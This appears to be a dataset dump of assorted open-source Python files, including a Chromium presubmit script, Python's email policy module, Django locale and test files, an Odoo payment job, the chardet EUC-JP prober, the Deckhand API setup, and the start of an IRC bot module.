repo_name
stringlengths 5
100
| ref
stringlengths 12
67
| path
stringlengths 4
244
| copies
stringlengths 1
8
| content
stringlengths 0
1.05M
⌀ |
|---|---|---|---|---|
kenshay/ImageScript
|
refs/heads/master
|
ProgramData/Android/ADB/platform-tools/systrace/catapult/devil/PRESUBMIT.py
|
9
|
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Presubmit script for devil.
See http://dev.chromium.org/developers/how-tos/depottools/presubmit-scripts for
details on the presubmit API built into depot_tools.
"""
def _RunPylint(input_api, output_api):
return input_api.RunTests(input_api.canned_checks.RunPylint(
input_api, output_api, pylintrc='pylintrc'))
def _RunUnitTests(input_api, output_api):
def J(*dirs):
"""Returns a path relative to presubmit directory."""
return input_api.os_path.join(
input_api.PresubmitLocalPath(), 'devil', *dirs)
test_env = dict(input_api.environ)
test_env.update({
'PYTHONDONTWRITEBYTECODE': '1',
'PYTHONPATH': ':'.join([J(), J('..')]),
})
message_type = (output_api.PresubmitError if input_api.is_committing
else output_api.PresubmitPromptWarning)
return input_api.RunTests([
input_api.Command(
name='devil/bin/run_py_tests',
cmd=[
input_api.os_path.join(
input_api.PresubmitLocalPath(), 'bin', 'run_py_tests')],
kwargs={'env': test_env},
message=message_type)])
def _EnsureNoPylibUse(input_api, output_api):
def other_python_files(f):
this_presubmit_file = input_api.os_path.join(
input_api.PresubmitLocalPath(), 'PRESUBMIT.py')
return (f.LocalPath().endswith('.py')
and not f.AbsoluteLocalPath() == this_presubmit_file)
changed_files = input_api.AffectedSourceFiles(other_python_files)
import_error_re = input_api.re.compile(
r'(from pylib.* import)|(import pylib)')
errors = []
for f in changed_files:
errors.extend(
'%s:%d' % (f.LocalPath(), line_number)
for line_number, line_text in f.ChangedContents()
if import_error_re.search(line_text))
if errors:
return [output_api.PresubmitError(
'pylib modules should not be imported from devil modules.',
items=errors)]
return []
def CommonChecks(input_api, output_api):
output = []
output += _RunPylint(input_api, output_api)
output += _RunUnitTests(input_api, output_api)
output += _EnsureNoPylibUse(input_api, output_api)
return output
def CheckChangeOnUpload(input_api, output_api):
return CommonChecks(input_api, output_api)
def CheckChangeOnCommit(input_api, output_api):
return CommonChecks(input_api, output_api)
|
75651/kbengine_cloud
|
refs/heads/master
|
kbe/src/lib/python/Lib/email/_policybase.py
|
94
|
"""Policy framework for the email package.
Allows fine grained feature control of how the package parses and emits data.
"""
import abc
from email import header
from email import charset as _charset
from email.utils import _has_surrogates
__all__ = [
'Policy',
'Compat32',
'compat32',
]
class _PolicyBase:
"""Policy Object basic framework.
This class is useless unless subclassed. A subclass should define
class attributes with defaults for any values that are to be
managed by the Policy object. The constructor will then allow
non-default values to be set for these attributes at instance
creation time. The instance will be callable, taking these same
attributes keyword arguments, and returning a new instance
identical to the called instance except for those values changed
by the keyword arguments. Instances may be added, yielding new
instances with any non-default values from the right hand
operand overriding those in the left hand operand. That is,
A + B == A(<non-default values of B>)
The repr of an instance can be used to reconstruct the object
if and only if the repr of the values can be used to reconstruct
those values.
"""
def __init__(self, **kw):
"""Create new Policy, possibly overriding some defaults.
See class docstring for a list of overridable attributes.
"""
for name, value in kw.items():
if hasattr(self, name):
super(_PolicyBase,self).__setattr__(name, value)
else:
raise TypeError(
"{!r} is an invalid keyword argument for {}".format(
name, self.__class__.__name__))
def __repr__(self):
args = [ "{}={!r}".format(name, value)
for name, value in self.__dict__.items() ]
return "{}({})".format(self.__class__.__name__, ', '.join(args))
def clone(self, **kw):
"""Return a new instance with specified attributes changed.
The new instance has the same attribute values as the current object,
except for the changes passed in as keyword arguments.
"""
newpolicy = self.__class__.__new__(self.__class__)
for attr, value in self.__dict__.items():
object.__setattr__(newpolicy, attr, value)
for attr, value in kw.items():
if not hasattr(self, attr):
raise TypeError(
"{!r} is an invalid keyword argument for {}".format(
attr, self.__class__.__name__))
object.__setattr__(newpolicy, attr, value)
return newpolicy
def __setattr__(self, name, value):
if hasattr(self, name):
msg = "{!r} object attribute {!r} is read-only"
else:
msg = "{!r} object has no attribute {!r}"
raise AttributeError(msg.format(self.__class__.__name__, name))
def __add__(self, other):
"""Non-default values from right operand override those from left.
The object returned is a new instance of the subclass.
"""
return self.clone(**other.__dict__)
def _append_doc(doc, added_doc):
doc = doc.rsplit('\n', 1)[0]
added_doc = added_doc.split('\n', 1)[1]
return doc + '\n' + added_doc
def _extend_docstrings(cls):
if cls.__doc__ and cls.__doc__.startswith('+'):
cls.__doc__ = _append_doc(cls.__bases__[0].__doc__, cls.__doc__)
for name, attr in cls.__dict__.items():
if attr.__doc__ and attr.__doc__.startswith('+'):
for c in (c for base in cls.__bases__ for c in base.mro()):
doc = getattr(getattr(c, name), '__doc__')
if doc:
attr.__doc__ = _append_doc(doc, attr.__doc__)
break
return cls
class Policy(_PolicyBase, metaclass=abc.ABCMeta):
r"""Controls for how messages are interpreted and formatted.
Most of the classes and many of the methods in the email package accept
Policy objects as parameters. A Policy object contains a set of values and
functions that control how input is interpreted and how output is rendered.
For example, the parameter 'raise_on_defect' controls whether or not an RFC
violation results in an error being raised or not, while 'max_line_length'
controls the maximum length of output lines when a Message is serialized.
Any valid attribute may be overridden when a Policy is created by passing
it as a keyword argument to the constructor. Policy objects are immutable,
but a new Policy object can be created with only certain values changed by
calling the Policy instance with keyword arguments. Policy objects can
also be added, producing a new Policy object in which the non-default
attributes set in the right hand operand overwrite those specified in the
left operand.
Settable attributes:
raise_on_defect -- If true, then defects should be raised as errors.
Default: False.
linesep -- string containing the value to use as separation
between output lines. Default '\n'.
cte_type -- Type of allowed content transfer encodings
7bit -- ASCII only
8bit -- Content-Transfer-Encoding: 8bit is allowed
Default: 8bit. Also controls the disposition of
(RFC invalid) binary data in headers; see the
documentation of the binary_fold method.
max_line_length -- maximum length of lines, excluding 'linesep',
during serialization. None or 0 means no line
wrapping is done. Default is 78.
"""
raise_on_defect = False
linesep = '\n'
cte_type = '8bit'
max_line_length = 78
def handle_defect(self, obj, defect):
"""Based on policy, either raise defect or call register_defect.
handle_defect(obj, defect)
defect should be a Defect subclass, but in any case must be an
Exception subclass. obj is the object on which the defect should be
registered if it is not raised. If the raise_on_defect is True, the
defect is raised as an error, otherwise the object and the defect are
passed to register_defect.
This method is intended to be called by parsers that discover defects.
The email package parsers always call it with Defect instances.
"""
if self.raise_on_defect:
raise defect
self.register_defect(obj, defect)
def register_defect(self, obj, defect):
"""Record 'defect' on 'obj'.
Called by handle_defect if raise_on_defect is False. This method is
part of the Policy API so that Policy subclasses can implement custom
defect handling. The default implementation calls the append method of
the defects attribute of obj. The objects used by the email package by
default that get passed to this method will always have a defects
attribute with an append method.
"""
obj.defects.append(defect)
def header_max_count(self, name):
"""Return the maximum allowed number of headers named 'name'.
Called when a header is added to a Message object. If the returned
value is not 0 or None, and there are already a number of headers with
the name 'name' equal to the value returned, a ValueError is raised.
Because the default behavior of Message's __setitem__ is to append the
value to the list of headers, it is easy to create duplicate headers
without realizing it. This method allows certain headers to be limited
in the number of instances of that header that may be added to a
Message programmatically. (The limit is not observed by the parser,
which will faithfully produce as many headers as exist in the message
being parsed.)
The default implementation returns None for all header names.
"""
return None
@abc.abstractmethod
def header_source_parse(self, sourcelines):
"""Given a list of linesep terminated strings constituting the lines of
a single header, return the (name, value) tuple that should be stored
in the model. The input lines should retain their terminating linesep
characters. The lines passed in by the email package may contain
surrogateescaped binary data.
"""
raise NotImplementedError
@abc.abstractmethod
def header_store_parse(self, name, value):
"""Given the header name and the value provided by the application
program, return the (name, value) that should be stored in the model.
"""
raise NotImplementedError
@abc.abstractmethod
def header_fetch_parse(self, name, value):
"""Given the header name and the value from the model, return the value
to be returned to the application program that is requesting that
header. The value passed in by the email package may contain
surrogateescaped binary data if the lines were parsed by a BytesParser.
The returned value should not contain any surrogateescaped data.
"""
raise NotImplementedError
@abc.abstractmethod
def fold(self, name, value):
"""Given the header name and the value from the model, return a string
containing linesep characters that implement the folding of the header
according to the policy controls. The value passed in by the email
package may contain surrogateescaped binary data if the lines were
parsed by a BytesParser. The returned value should not contain any
surrogateescaped data.
"""
raise NotImplementedError
@abc.abstractmethod
def fold_binary(self, name, value):
"""Given the header name and the value from the model, return binary
data containing linesep characters that implement the folding of the
header according to the policy controls. The value passed in by the
email package may contain surrogateescaped binary data.
"""
raise NotImplementedError
@_extend_docstrings
class Compat32(Policy):
"""+
This particular policy is the backward compatibility Policy. It
replicates the behavior of the email package version 5.1.
"""
def _sanitize_header(self, name, value):
# If the header value contains surrogates, return a Header using
# the unknown-8bit charset to encode the bytes as encoded words.
if not isinstance(value, str):
# Assume it is already a header object
return value
if _has_surrogates(value):
return header.Header(value, charset=_charset.UNKNOWN8BIT,
header_name=name)
else:
return value
def header_source_parse(self, sourcelines):
"""+
The name is parsed as everything up to the ':' and returned unmodified.
The value is determined by stripping leading whitespace off the
remainder of the first line, joining all subsequent lines together, and
stripping any trailing carriage return or linefeed characters.
"""
name, value = sourcelines[0].split(':', 1)
value = value.lstrip(' \t') + ''.join(sourcelines[1:])
return (name, value.rstrip('\r\n'))
def header_store_parse(self, name, value):
"""+
The name and value are returned unmodified.
"""
return (name, value)
def header_fetch_parse(self, name, value):
"""+
If the value contains binary data, it is converted into a Header object
using the unknown-8bit charset. Otherwise it is returned unmodified.
"""
return self._sanitize_header(name, value)
def fold(self, name, value):
"""+
Headers are folded using the Header folding algorithm, which preserves
existing line breaks in the value, and wraps each resulting line to the
max_line_length. Non-ASCII binary data are CTE encoded using the
unknown-8bit charset.
"""
return self._fold(name, value, sanitize=True)
def fold_binary(self, name, value):
"""+
Headers are folded using the Header folding algorithm, which preserves
existing line breaks in the value, and wraps each resulting line to the
max_line_length. If cte_type is 7bit, non-ascii binary data is CTE
encoded using the unknown-8bit charset. Otherwise the original source
header is used, with its existing line breaks and/or binary data.
"""
folded = self._fold(name, value, sanitize=self.cte_type=='7bit')
return folded.encode('ascii', 'surrogateescape')
def _fold(self, name, value, sanitize):
parts = []
parts.append('%s: ' % name)
if isinstance(value, str):
if _has_surrogates(value):
if sanitize:
h = header.Header(value,
charset=_charset.UNKNOWN8BIT,
header_name=name)
else:
# If we have raw 8bit data in a byte string, we have no idea
# what the encoding is. There is no safe way to split this
# string. If it's ascii-subset, then we could do a normal
# ascii split, but if it's multibyte then we could break the
# string. There's no way to know so the least harm seems to
# be to not split the string and risk it being too long.
parts.append(value)
h = None
else:
h = header.Header(value, header_name=name)
else:
# Assume it is a Header-like object.
h = value
if h is not None:
parts.append(h.encode(linesep=self.linesep,
maxlinelen=self.max_line_length))
parts.append(self.linesep)
return ''.join(parts)
compat32 = Compat32()
|
avneesh91/django
|
refs/heads/master
|
django/conf/locale/da/formats.py
|
65
|
# This file is distributed under the same license as the Django package.
#
# The *_FORMAT strings use the Django date format syntax,
# see http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
DATE_FORMAT = 'j. F Y'
TIME_FORMAT = 'H:i'
DATETIME_FORMAT = 'j. F Y H:i'
YEAR_MONTH_FORMAT = 'F Y'
MONTH_DAY_FORMAT = 'j. F'
SHORT_DATE_FORMAT = 'd.m.Y'
SHORT_DATETIME_FORMAT = 'd.m.Y H:i'
FIRST_DAY_OF_WEEK = 1
# The *_INPUT_FORMATS strings use the Python strftime format syntax,
# see http://docs.python.org/library/datetime.html#strftime-strptime-behavior
DATE_INPUT_FORMATS = [
'%d.%m.%Y', # '25.10.2006'
]
DATETIME_INPUT_FORMATS = [
'%d.%m.%Y %H:%M:%S', # '25.10.2006 14:30:59'
'%d.%m.%Y %H:%M:%S.%f', # '25.10.2006 14:30:59.000200'
'%d.%m.%Y %H:%M', # '25.10.2006 14:30'
]
DECIMAL_SEPARATOR = ','
THOUSAND_SEPARATOR = '.'
NUMBER_GROUPING = 3
|
camillemonchicourt/Geotrek
|
refs/heads/master
|
geotrek/tourism/migrations/0003_auto__change_field_datasource_targets.py
|
1
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Changing field 'DataSource.targets'
db.alter_column('t_t_source_donnees', 'targets', self.gf('multiselectfield.db.fields.MultiSelectField')(max_length=512, null=True))
def backwards(self, orm):
# Changing field 'DataSource.targets'
db.alter_column('t_t_source_donnees', 'targets', self.gf('multiselectfield.db.fields.MultiSelectField')(max_length=200, null=True))
models = {
u'tourism.datasource': {
'Meta': {'ordering': "['title', 'url']", 'object_name': 'DataSource', 'db_table': "'t_t_source_donnees'"},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'pictogram': ('django.db.models.fields.files.FileField', [], {'max_length': '512', 'db_column': "'picto'"}),
'targets': ('multiselectfield.db.fields.MultiSelectField', [], {'max_length': '512', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '128', 'db_column': "'titre'"}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_column': "'type'"}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '400', 'db_column': "'url'"})
}
}
complete_apps = ['tourism']
|
OCA/sale-workflow
|
refs/heads/12.0
|
sale_automatic_workflow_payment_mode/models/automatic_workflow_job.py
|
1
|
# © 2016 Camptocamp SA, Sodexis
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl.html)
import logging
from odoo import models, api, fields
from odoo.tools.safe_eval import safe_eval
from odoo.addons.sale_automatic_workflow.models.automatic_workflow_job \
import savepoint
_logger = logging.getLogger(__name__)
class AutomaticWorkflowJob(models.Model):
_inherit = 'automatic.workflow.job'
@api.model
def run_with_workflow(self, sale_wkf):
workflow_domain = [('workflow_process_id', '=', sale_wkf.id)]
res = super(AutomaticWorkflowJob, self).run_with_workflow(sale_wkf)
if sale_wkf.register_payment:
self._register_payments(
safe_eval(sale_wkf.payment_filter_id.domain) +
workflow_domain)
return res
@api.model
def _register_payments(self, payment_filter):
invoice_obj = self.env['account.invoice']
invoices = invoice_obj.search(payment_filter)
_logger.debug('Invoices to Register Payment: %s', invoices.ids)
for invoice in invoices:
partner_type = invoice.type in ('out_invoice', 'out_refund') and \
'customer' or 'supplier'
payment_mode = invoice.payment_mode_id
if not payment_mode.fixed_journal_id:
_logger.debug('Unable to Register Payment for invoice %s: '
'Payment mode %s must have fixed journal',
invoice.id, payment_mode.id)
return
with savepoint(self.env.cr):
payment = self.env['account.payment'].create({
'invoice_ids': [(6, 0, invoice.ids)],
'amount': invoice.residual,
'payment_date': fields.Date.context_today(self),
'communication': invoice.reference or invoice.number,
'partner_id': invoice.partner_id.id,
'partner_type': partner_type,
'payment_type': payment_mode.payment_type,
'payment_method_id': payment_mode.payment_method_id.id,
'journal_id': payment_mode.fixed_journal_id.id,
})
payment.post()
return
|
kemalakyol48/python-for-android
|
refs/heads/master
|
python3-alpha/python3-src/Lib/tkinter/test/runtktests.py
|
67
|
"""
Use this module to get and run all tk tests.
tkinter tests should live in a package inside the directory where this file
lives, like test_tkinter.
Extensions also should live in packages following the same rule as above.
"""
import os
import sys
import unittest
import importlib
import test.support
this_dir_path = os.path.abspath(os.path.dirname(__file__))
def is_package(path):
for name in os.listdir(path):
if name in ('__init__.py', '__init__.pyc', '__init.pyo'):
return True
return False
def get_tests_modules(basepath=this_dir_path, gui=True, packages=None):
"""This will import and yield modules whose names start with test_
and are inside packages found in the path starting at basepath.
If packages is specified it should contain package names that
want their tests collected.
"""
py_ext = '.py'
for dirpath, dirnames, filenames in os.walk(basepath):
for dirname in list(dirnames):
if dirname[0] == '.':
dirnames.remove(dirname)
if is_package(dirpath) and filenames:
pkg_name = dirpath[len(basepath) + len(os.sep):].replace('/', '.')
if packages and pkg_name not in packages:
continue
filenames = filter(
lambda x: x.startswith('test_') and x.endswith(py_ext),
filenames)
for name in filenames:
try:
yield importlib.import_module(
".%s.%s" % (pkg_name, name[:-len(py_ext)]),
"tkinter.test")
except test.support.ResourceDenied:
if gui:
raise
def get_tests(text=True, gui=True, packages=None):
"""Yield all the tests in the modules found by get_tests_modules.
If nogui is True, only tests that do not require a GUI will be
returned."""
attrs = []
if text:
attrs.append('tests_nogui')
if gui:
attrs.append('tests_gui')
for module in get_tests_modules(gui=gui, packages=packages):
for attr in attrs:
for test in getattr(module, attr, ()):
yield test
if __name__ == "__main__":
test.support.use_resources = ['gui']
test.support.run_unittest(*get_tests())
|
sachingupta006/Mezzanine
|
refs/heads/master
|
mezzanine/template/__init__.py
|
4
|
from functools import wraps
from django import template
from django.template.context import Context
from django.template.loader import get_template, select_template
from mezzanine.utils.device import templates_for_device
class Library(template.Library):
"""
Extends ``django.template.Library`` providing several shortcuts
that attempt to take the leg-work out of creating different types
of template tags.
"""
def as_tag(self, tag_func):
"""
Creates a tag expecting the format:
``{% tag_name as var_name %}``
The decorated func returns the value that is given to
``var_name`` in the template.
"""
@wraps(tag_func)
def tag_wrapper(parser, token):
class AsTagNode(template.Node):
def render(self, context):
parts = token.split_contents()
# Resolve variables if their names are given.
def resolve(arg):
try:
return template.Variable(arg).resolve(context)
except template.VariableDoesNotExist:
return arg
args = [resolve(arg) for arg in parts[1:-2]]
context[parts[-1]] = tag_func(*args)
return ""
return AsTagNode()
return self.tag(tag_wrapper)
def render_tag(self, tag_func):
"""
Creates a tag using the decorated func as the render function
for the template tag node. The render function takes two
arguments - the template context and the tag token.
"""
@wraps(tag_func)
def tag_wrapper(parser, token):
class RenderTagNode(template.Node):
def render(self, context):
return tag_func(context, token)
return RenderTagNode()
return self.tag(tag_wrapper)
def to_end_tag(self, tag_func):
"""
Creates a tag that parses until it finds the corresponding end
tag, eg: for a tag named ``mytag`` it will parse until
``endmytag``. The decorated func's return value is used to
render the parsed content and takes three arguments - the
parsed content between the start and end tags, the template
context and the tag token.
"""
@wraps(tag_func)
def tag_wrapper(parser, token):
class ToEndTagNode(template.Node):
def __init__(self):
end_name = "end%s" % tag_func.__name__
self.nodelist = parser.parse((end_name,))
parser.delete_first_token()
def render(self, context):
args = (self.nodelist.render(context), context, token)
return tag_func(*args[:tag_func.func_code.co_argcount])
return ToEndTagNode()
return self.tag(tag_wrapper)
def inclusion_tag(self, name, context_class=Context, takes_context=False):
"""
Replacement for Django's ``inclusion_tag`` which looks up device
specific templates at render time.
"""
def tag_decorator(tag_func):
@wraps(tag_func)
def tag_wrapper(parser, token):
class InclusionTagNode(template.Node):
def render(self, context):
if not getattr(self, "nodelist", False):
try:
request = context["request"]
except KeyError:
t = get_template(name)
else:
ts = templates_for_device(request, name)
t = select_template(ts)
self.nodelist = t.nodelist
parts = [template.Variable(part).resolve(context)
for part in token.split_contents()[1:]]
if takes_context:
parts.insert(0, context)
result = tag_func(*parts)
autoescape = context.autoescape
context = context_class(result, autoescape=autoescape)
return self.nodelist.render(context)
return InclusionTagNode()
return self.tag(tag_wrapper)
return tag_decorator
|
hansiu/pathways-analysis
|
refs/heads/master
|
command_line/__init__.py
|
3
|
"""This package provides Command Line Interface (CLI) implementation.
If you wish to streamline the CLI or add a new switch or argument,
please go straight to `main.py` module. Helper type definitions
are defined in `types.py`, while magic happens in `parser.py`.
"""
from .main import CLI
|
jeezybrick/django
|
refs/heads/master
|
tests/template_tests/filter_tests/test_center.py
|
345
|
from django.template.defaultfilters import center
from django.test import SimpleTestCase
from django.utils.safestring import mark_safe
from ..utils import setup
class CenterTests(SimpleTestCase):
@setup({'center01':
'{% autoescape off %}.{{ a|center:"5" }}. .{{ b|center:"5" }}.{% endautoescape %}'})
def test_center01(self):
output = self.engine.render_to_string('center01', {"a": "a&b", "b": mark_safe("a&b")})
self.assertEqual(output, ". a&b . . a&b .")
@setup({'center02': '.{{ a|center:"5" }}. .{{ b|center:"5" }}.'})
def test_center02(self):
output = self.engine.render_to_string('center02', {"a": "a&b", "b": mark_safe("a&b")})
self.assertEqual(output, ". a&b . . a&b .")
class FunctionTests(SimpleTestCase):
def test_center(self):
self.assertEqual(center('test', 6), ' test ')
def test_non_string_input(self):
self.assertEqual(center(123, 5), ' 123 ')
|
semonte/intellij-community
|
refs/heads/master
|
python/testData/intentions/PyConvertToFStringIntentionTest/formatMethodByteString.py
|
31
|
b'{}'.format(42)
|
cydenix/OpenGLCffi
|
refs/heads/master
|
OpenGLCffi/GL/EXT/EXT/window_rectangles.py
|
1
|
from OpenGLCffi.GL import params
@params(api='gl', prms=['mode', 'count', 'box'])
def glWindowRectanglesEXT(mode, count, box):
pass
|
matplotlib/fcpy
|
refs/heads/master
|
examples/fc_match.py
|
1
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
#
# Copyright (c) 2015, Michael Droettboom
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# The views and conclusions contained in the software and documentation are those
# of the authors and should not be interpreted as representing official policies,
# either expressed or implied, of the FreeBSD Project.
#
# -----------------------------------------------------------------------------
'''
Demonstrates doing font matching
'''
from __future__ import print_function, unicode_literals, absolute_import
import fcpy
config = fcpy.default_config()
config.build_fonts()
pattern = fcpy.Pattern(family="Droid Sans")
print(pattern)
config.substitute(pattern)
pattern.substitute()
print(pattern)
pattern.set('family', 'Droid Sans')
print(pattern)
match = config.match(pattern)
print(match)
print(match.get('file', 0))
|
andfoy/margffoy-tuay-server
|
refs/heads/master
|
env/lib/python2.7/site-packages/requests-2.7.0-py2.7.egg/requests/packages/chardet/eucjpprober.py
|
2918
|
######################## BEGIN LICENSE BLOCK ########################
# The Original Code is mozilla.org code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import sys
from . import constants
from .mbcharsetprober import MultiByteCharSetProber
from .codingstatemachine import CodingStateMachine
from .chardistribution import EUCJPDistributionAnalysis
from .jpcntx import EUCJPContextAnalysis
from .mbcssm import EUCJPSMModel
class EUCJPProber(MultiByteCharSetProber):
def __init__(self):
MultiByteCharSetProber.__init__(self)
self._mCodingSM = CodingStateMachine(EUCJPSMModel)
self._mDistributionAnalyzer = EUCJPDistributionAnalysis()
self._mContextAnalyzer = EUCJPContextAnalysis()
self.reset()
def reset(self):
MultiByteCharSetProber.reset(self)
self._mContextAnalyzer.reset()
def get_charset_name(self):
return "EUC-JP"
def feed(self, aBuf):
aLen = len(aBuf)
for i in range(0, aLen):
# PY3K: aBuf is a byte array, so aBuf[i] is an int, not a byte
codingState = self._mCodingSM.next_state(aBuf[i])
if codingState == constants.eError:
if constants._debug:
sys.stderr.write(self.get_charset_name()
+ ' prober hit error at byte ' + str(i)
+ '\n')
self._mState = constants.eNotMe
break
elif codingState == constants.eItsMe:
self._mState = constants.eFoundIt
break
elif codingState == constants.eStart:
charLen = self._mCodingSM.get_current_charlen()
if i == 0:
self._mLastChar[1] = aBuf[0]
self._mContextAnalyzer.feed(self._mLastChar, charLen)
self._mDistributionAnalyzer.feed(self._mLastChar, charLen)
else:
self._mContextAnalyzer.feed(aBuf[i - 1:i + 1], charLen)
self._mDistributionAnalyzer.feed(aBuf[i - 1:i + 1],
charLen)
self._mLastChar[0] = aBuf[aLen - 1]
if self.get_state() == constants.eDetecting:
if (self._mContextAnalyzer.got_enough_data() and
(self.get_confidence() > constants.SHORTCUT_THRESHOLD)):
self._mState = constants.eFoundIt
return self.get_state()
def get_confidence(self):
contxtCf = self._mContextAnalyzer.get_confidence()
distribCf = self._mDistributionAnalyzer.get_confidence()
return max(contxtCf, distribCf)
|
att-comdev/deckhand
|
refs/heads/master
|
deckhand/control/api.py
|
1
|
# Copyright 2017 AT&T Intellectual Property. All other rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging as py_logging
import os
from oslo_config import cfg
from oslo_log import log as logging
from oslo_policy import policy
from paste import deploy
from deckhand.db.sqlalchemy import api as db_api
CONF = cfg.CONF
logging.register_options(CONF)
LOG = logging.getLogger(__name__)
CONFIG_FILES = {
'conf': 'deckhand.conf',
'paste': 'deckhand-paste.ini'
}
_NO_AUTH_CONFIG = 'noauth-paste.ini'
def _get_config_files(env=None):
if env is None:
env = os.environ
config_files = CONFIG_FILES.copy()
dirname = env.get('DECKHAND_CONFIG_DIR', '/etc/deckhand').strip()
# Workaround the fact that this reads from a config file to determine which
# paste.ini file to use for server instantiation. This chicken and egg
# problem is solved by using ConfigParser below.
conf_path = os.path.join(dirname, config_files['conf'])
temp_conf = {}
config_parser = cfg.ConfigParser(conf_path, temp_conf)
config_parser.parse()
use_development_mode = (
temp_conf['DEFAULT'].get('development_mode') == ['true']
)
if use_development_mode:
config_files['paste'] = _NO_AUTH_CONFIG
LOG.warning('Development mode enabled - Keystone authentication '
'disabled.')
return {
key: os.path.join(dirname, file) for key, file in config_files.items()
}
def setup_logging(conf):
logging.set_defaults(default_log_levels=logging.get_default_log_levels())
logging.setup(conf, 'deckhand')
py_logging.captureWarnings(True)
def init_application():
"""Main entry point for initializing the Deckhand API service.
Create routes for the v1.0 API and sets up logging.
"""
config_files = _get_config_files()
paste_file = config_files['paste']
CONF([],
project='deckhand',
default_config_files=list(config_files.values()))
setup_logging(CONF)
policy.Enforcer(CONF)
LOG.debug('Starting WSGI application using %s configuration file.',
paste_file)
db_api.setup_db(CONF.database.connection)
app = deploy.loadapp('config:%s' % paste_file, name='deckhand_api')
return app
if __name__ == '__main__':
init_application()
|
brosner/django-notification
|
refs/heads/master
|
notification/__init__.py
|
3
|
VERSION = (0, 2, 0, "a", 1) # following PEP 386
DEV_N = 4
def get_version():
version = "%s.%s" % (VERSION[0], VERSION[1])
if VERSION[2]:
version = "%s.%s" % (version, VERSION[2])
if VERSION[3] != "f":
version = "%s%s%s" % (version, VERSION[3], VERSION[4])
if DEV_N:
version = "%s.dev%s" % (version, DEV_N)
return version
__version__ = get_version()
|
modulexcite/blink
|
refs/heads/nw12
|
Tools/Scripts/webkitpy/thirdparty/irc/ircbot.py
|
87
|
# Copyright (C) 1999--2002 Joel Rosdahl
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# Joel Rosdahl <joel@rosdahl.net>
#
# $Id: ircbot.py,v 1.23 2008/09/11 07:38:30 keltus Exp $
"""ircbot -- Simple IRC bot library.
This module contains a single-server IRC bot class that can be used to
write simpler bots.
"""
import sys
from UserDict import UserDict
from irclib import SimpleIRCClient
from irclib import nm_to_n, irc_lower, all_events
from irclib import parse_channel_modes, is_channel
from irclib import ServerConnectionError
class SingleServerIRCBot(SimpleIRCClient):
"""A single-server IRC bot class.
The bot tries to reconnect if it is disconnected.
The bot keeps track of the channels it has joined, the other
clients that are present in the channels and which of those that
have operator or voice modes. The "database" is kept in the
self.channels attribute, which is an IRCDict of Channels.
"""
def __init__(self, server_list, nickname, realname, reconnection_interval=60):
"""Constructor for SingleServerIRCBot objects.
Arguments:
server_list -- A list of tuples (server, port) that
defines which servers the bot should try to
connect to.
nickname -- The bot's nickname.
realname -- The bot's realname.
reconnection_interval -- How long the bot should wait
before trying to reconnect.
dcc_connections -- A list of initiated/accepted DCC
connections.
"""
